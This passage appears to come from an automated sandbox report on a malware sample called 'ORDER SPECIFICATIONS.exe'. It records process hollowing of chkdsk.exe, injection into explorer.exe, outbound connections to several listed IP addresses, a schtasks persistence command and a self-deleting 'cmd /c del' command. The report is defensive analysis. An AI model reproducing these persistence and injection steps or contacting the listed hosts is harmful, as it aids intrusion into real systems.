            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0555849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05549080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055C3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055890AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05618F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0555EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05573B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0555FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05618B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0556F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055DFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0561070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05544F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0560131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055C53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055837F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05572397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05558794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05615BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05551B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055FD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0560138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05618A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055D4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05549240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05557E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0558927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0556AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0555766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055FB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05563A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05578E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05558A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055FFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055736CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05572ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055FFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05588EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05572AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055716E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05618ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055576E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05610EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055DFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0555AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe Network Connect: 170.106.171.56 80
            Source: C:\Windows\explorer.exe Network Connect: 54.85.86.211 80
            Source: C:\Windows\explorer.exe Network Connect: 13.57.130.120 80
            Source: C:\Windows\explorer.exe Network Connect: 34.90.54.238 80
            Source: C:\Windows\explorer.exe Network Connect: 50.87.196.120 80
            Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exe Network Connect: 156.240.32.114 80
            Source: C:\Windows\explorer.exe Network Connect: 154.91.61.105 80
            Injects a PE file into a foreign process
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Memory written: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Thread register set: target process: 3472
            Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 3472
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 11D0000
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Process created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Process created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp Binary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
            Source: explorer.exe, 00000007.00000000.258833766.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
